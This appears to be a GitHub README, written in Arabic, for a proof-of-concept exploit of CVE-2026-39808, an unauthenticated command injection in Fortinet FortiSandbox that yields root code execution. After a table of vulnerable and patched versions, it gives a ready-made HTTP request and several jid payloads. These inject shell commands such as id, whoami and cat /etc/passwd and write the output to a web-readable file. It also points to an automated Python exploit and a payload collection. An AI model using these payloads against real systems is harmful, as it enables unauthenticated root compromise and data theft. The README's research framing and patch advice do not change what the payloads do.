
CVE-2026-39808
يحتوي هذا المستودع على إثبات مفهوم واضح وموثق بشكل جيد لـ CVE-2026-39808 — ثغرة حقن أوامر غير مصادق عليها حرجة في Fortinet FortiSandbox تسمح بـ هروب صندوق الرمل وتنفيذ تعليمات برمجية عن بُعد كـ جذر (uid=0).
jid
استغلال ناجح يظهر uid=0 gid=0 groups=0
| Version Range | Status |
|---|---|
| FortiSandbox 4.4.0 – 4.4.8 | قابل للاستغلال |
| FortiSandbox 5.0.0 – 5.0.5 | قابل للاستغلال |
| 4.4.9+ / 5.0.6+ | مُصحَّح |
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip
افتح في المتصفح:
https://your-lab-ip/ng/out.txt
# احصل على عنوان IP + اسم المضيف
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|
# استطلاع كامل للنظام
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|
poc.py → استغلال Python آليburp-request.txt → طلب Burp Suite جاهز للاستخدامpayloads.md → مجموعة من الحمولات المفيدةscreenshots/ → صور خطوة بخطوة للاستغلالREADME.md → هذا الملفقم بتحديث FortiSandbox فورًا إلى أحد الإصدارات التالية:
أصدرت Fortinet تصحيحات رسمية لمعالجة هذه الثغرة.
مصنوع لأغراض البحث والتعلم
⭐ قم بوضع نجمة لهذا المستودع إذا ساعدك!